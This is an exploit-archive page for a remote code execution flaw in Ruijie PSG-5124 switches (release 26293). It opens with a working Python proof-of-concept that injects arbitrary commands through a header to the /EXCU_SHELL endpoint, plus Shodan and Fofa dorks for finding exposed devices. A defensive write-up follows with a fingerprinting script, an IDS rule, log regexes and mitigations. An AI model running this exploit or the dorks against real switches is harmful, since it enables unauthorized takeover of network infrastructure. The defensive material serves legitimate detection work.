Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)

Exploit Author: ByteHunter
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Python
Published Date: 2024-03-14
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)

import http.client
import argparse

def send_request(ip, port, command):
    headers = {
        "Host": f"{ip}:{port}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cmdnum": "1",
        "Confirm1": "n",
        "Content-Length": "0",
        "Command1": command
    }

    try:
        connection = http.client.HTTPConnection(f"{ip}:{port}")
        connection.request("GET", "/EXCU_SHELL", headers=headers)
        response = connection.getresponse()

        print(f"Status Code: {response.status}")
        print(response.read().decode('utf-8'))
        connection.close()

    except Exception as e:
        print(f"Request failed: {e}")

if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
    parser.add_argument('--ip', help='Target IP address', required=True)
    parser.add_argument('--port', help='Port', required=True)
    parser.add_argument('--cmd', help='Command', required=True)
    args = parser.parse_args()

    ip = args.ip
    port = args.port
    command = args.cmd

    send_request(ip, port, command)

Ruijie Switch PSG-5124 (LINK SOFTWARE RELEASE:26293) — Remote Code Execution (RCE) Analysis and Mitigation

This article analyzes a reported remote code execution (RCE) issue affecting Ruijie PSG-5124 switches (LINK SOFTWARE RELEASE:26293). It explains the nature and impact of the vulnerability, non-actionable detection techniques, defensive controls, recommended mitigations, and responsible disclosure/testing practices for network defenders and administrators.

Overview

The Ruijie PSG-5124 series is a managed switch used in enterprise and campus networks. A security researcher reported that a specific firmware release (26293) exposes an HTTP management endpoint that accepts crafted requests and can lead to remote command execution on affected devices.

  • Affected product: Ruijie PSG-5124
  • Affected version: LINK SOFTWARE RELEASE:26293 (reported)
  • Risk: High — remote unauthenticated command execution can lead to full device compromise and network pivoting

Technical summary (non-actionable)

Reportedly, the device exposes a management HTTP interface that accepts crafted requests that can cause the device to execute arbitrary commands. The attack surface includes an unauthenticated web endpoint used by the switch’s administration UI. Because this can lead to execution at the system level, the impact includes device takeover, persistence, firmware modification, and movement into protected network segments.

This section intentionally omits exploit payloads and step-by-step attack instructions. The focus below is on detection, risk management and mitigation for defenders.

Indicators of Compromise and Discovery

When hunting for affected devices or potential exploitation, the following indicators are useful:

  • Web UI artifacts: known login page resources or image references found in the device’s HTTP response (publicly referenced by researchers and search engine queries).
  • Access attempts to suspicious or uncommon endpoints used by the device management interface.
  • Unusual system behavior on the switch: high CPU, unexpected reboots, changes to configuration files, or unexpected outbound connections originating from the device.

Safe detection: network reconnaissance (non-exploit)

To discover potentially affected devices without attempting exploitation, you can query the device web UI and search for known static strings used in the login page. The example below demonstrates a safe fingerprinting approach that only performs a benign GET to the root page and looks for known image references.

#!/usr/bin/env python3
# Safe fingerprinting: checks for web UI markers in a non-destructive way.
import sys

import requests
import urllib3

# Device UIs commonly use self-signed certificates, so verification is skipped;
# silence the warning that verify=False would otherwise print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Static resources referenced by the device's login page (the same strings as
# the Fofa dork in the advisory header).
MARKERS = ["img/free_login_ge.gif", "./img/login_bg.gif"]

def check_device(url, timeout=5):
    """Fetch the root page once and return the list of login-page markers found."""
    try:
        r = requests.get(url, timeout=timeout, verify=False)
    except requests.RequestException as e:
        print(f"Error checking {url}: {e}")
        return []
    found = [m for m in MARKERS if m in r.text]
    if found:
        print(f"Potential Ruijie PSG-5124 UI at {url}; matched markers: {found}")
    else:
        print(f"No markers detected at {url}")
    return found

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("Usage: python3 fingerprint.py http://HOST:PORT/")
        sys.exit(1)
    check_device(sys.argv[1])

Explanation: This script performs a harmless HTTP GET against the supplied URL and searches the response body for static image paths that are commonly present in the device’s login page. It does not attempt any additional requests, header injection, or command operations. Use it only against assets you own or are authorized to test.

Network IDS/IPS detection example

Monitoring traffic for access to suspicious management endpoints is a practical defensive measure. Below is an example Suricata/IDS rule that flags HTTP requests for a specific device management path. This rule is for detection only.

alert http any any -> any any (msg:"Possible Ruijie PSG-5124 management endpoint access"; \
flow:established,to_server; http.uri; content:"/EXCU_SHELL"; nocase; sid:1001001; rev:1;)

Explanation: The rule triggers on HTTP requests where the URI contains "/EXCU_SHELL". Tune the rule (source/destination nets, port restrictions) before deployment to avoid false positives and to limit it to your management-plane monitoring points.

Log-based detection (web server access logs)

Search webserver or proxy logs for requests to management paths or anomalous header fields. Example regex for typical web logs:

GET\s+/EXCU_SHELL\s+HTTP/\d\.\d

Explanation: Scanning logs for GET requests to /EXCU_SHELL helps identify attempts to reach that endpoint. Correlate with source IPs, times, and repeated attempts to prioritize investigation.
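The regex above turned into a small hunting script, added here as an illustration and not part of the original analysis: it parses Combined/Common Log Format lines, generalizes the match to any method, query string or letter case on the /EXCU_SHELL path, and aggregates attempts per source IP so repeated or successful (HTTP 200) requests can be prioritized. The log lines are constructed samples using documentation addresses.

```python
import re
# Request-line fields of a Combined/Common Log Format entry.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d" (?P<status>\d{3})'
)

# Same intent as the regex in the text, but matches any method, an optional
# query string, and either letter case on the /EXCU_SHELL path.
SUSPECT_PATH = re.compile(r'^/EXCU_SHELL(?:[/?].*)?$', re.IGNORECASE)

def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None

def find_suspect_requests(lines):
    """Return the parsed entries whose path targets the management endpoint."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and SUSPECT_PATH.match(entry["path"]):
            hits.append(entry)
    return hits

def summarize_by_source(hits):
    """Per source IP: attempt count, HTTP 200 count, first and last timestamp."""
    summary = {}
    for h in hits:
        s = summary.setdefault(h["ip"], {"attempts": 0, "successes": 0,
                                         "first_seen": h["ts"], "last_seen": h["ts"]})
        s["attempts"] += 1
        if h["status"] == "200":
            s["successes"] += 1
        s["last_seen"] = h["ts"]
    return summary

# Constructed sample lines, not real traffic (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
198.51.100.7 - - [14/Mar/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 2311
198.51.100.7 - - [14/Mar/2024:10:01:09 +0000] "GET /EXCU_SHELL HTTP/1.1" 200 87
198.51.100.7 - - [14/Mar/2024:10:01:15 +0000] "GET /excu_shell?x=1 HTTP/1.1" 200 91
203.0.113.5 - - [14/Mar/2024:10:02:41 +0000] "POST /EXCU_SHELL HTTP/1.1" 404 0
203.0.113.5 - - [14/Mar/2024:10:02:50 +0000] "GET /img/login_bg.gif HTTP/1.1" 200 4410
""".splitlines()

if __name__ == "__main__":
    for ip, s in summarize_by_source(find_suspect_requests(SAMPLE_LOG)).items():
        print(f"{ip}: {s['attempts']} attempt(s), {s['successes']} returned 200, "
              f"{s['first_seen']} .. {s['last_seen']}")
```

Standard access logs record only the request line, so the custom request headers used by the proof of concept are not visible here; a reverse proxy log or packet capture at the management-plane monitoring point is needed to inspect them.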

Impact and risk assessment

If exploitation is successful, an attacker may obtain full control of the switch’s control plane including:

  • Modification of VLANs, ACLs, and routing — enabling lateral movement or traffic interception.
  • Persistence on network infrastructure — tampering with logging, management accounts, or firmware.
  • Data exfiltration, service disruption, or use as a pivot point to attack other internal hosts.

Therefore, affected devices in critical network paths (core, distribution, DMZ) present a high business risk and should be prioritized for remediation.

Mitigation and remediation

Immediate mitigations reduce risk while you coordinate longer-term remediation (firmware fixes, configuration changes):

  • Isolate management interfaces: Restrict access to the switch management plane to dedicated management VLANs or out-of-band management networks.
  • Apply network ACLs: Limit which hosts can reach the switch’s web and management ports (HTTP/HTTPS, SSH, SNMP) via firewall rules.
  • Disable unsecured protocols: If possible, disable HTTP (use HTTPS only) and other unnecessary services on management interfaces.
  • Change default credentials and enforce strong authentication: Use unique admin passwords and consider role-based access and MFA where supported.
  • Update firmware: Contact Ruijie or your vendor/reseller for the latest firmware and security patches. Prioritize applying vendor-released fixes that address the issue.
  • Monitoring and alerting: Deploy IDS/IPS signatures and log-monitoring for access to suspicious endpoints, unusual commands, and changes to configuration.
  • Backup and recovery: Maintain verified configuration backups and a tested recovery plan in case of compromise.

Testing guidance and responsible disclosure

Testing for this vulnerability must be performed only with explicit authorization. Best practices for safe testing:

  • Use a dedicated lab or isolated network with identical hardware and firmware.
  • Obtain written permission before testing production systems.
  • Follow coordinated disclosure: notify the vendor (Ruijie) and provide reproduction steps, logs, and affected device information. Maintain an audit trail.
  • If you discover evidence of compromise in production, isolate the device from the network, capture volatile artifacts (console logs, running-process lists if possible), and engage incident response.

Expert tips for operators

  • Prioritize firmware inventory: know what models and firmware levels are in your environment and monitor vendor advisories.
  • Segment management traffic using dedicated switches or out-of-band management networks to prevent accidental exposure.
  • Harden logging and monitoring: centralize logs (SIEM), alert on configuration changes, and implement baseline integrity checks for critical infrastructure.
  • Review automated external scans (Shodan/FOFA results) and reduce public exposure of management interfaces.

Summary

The reported RCE affecting Ruijie PSG-5124 firmware release 26293 represents a high-impact risk if exploited. Network defenders should prioritize inventory, restrict management access, enable monitoring for suspicious endpoints, and work with Ruijie to obtain and deploy firmware updates. Only perform testing in authorized environments, and avoid attempting exploit activity against production devices or systems you do not own.

Aspect        Recommendation
Immediate     Restrict management access, monitor for /EXCU_SHELL, apply ACLs
Short term    Patch or apply vendor mitigation, enable HTTPS, change creds
Long term     Network segmentation, centralized logging, incident response readiness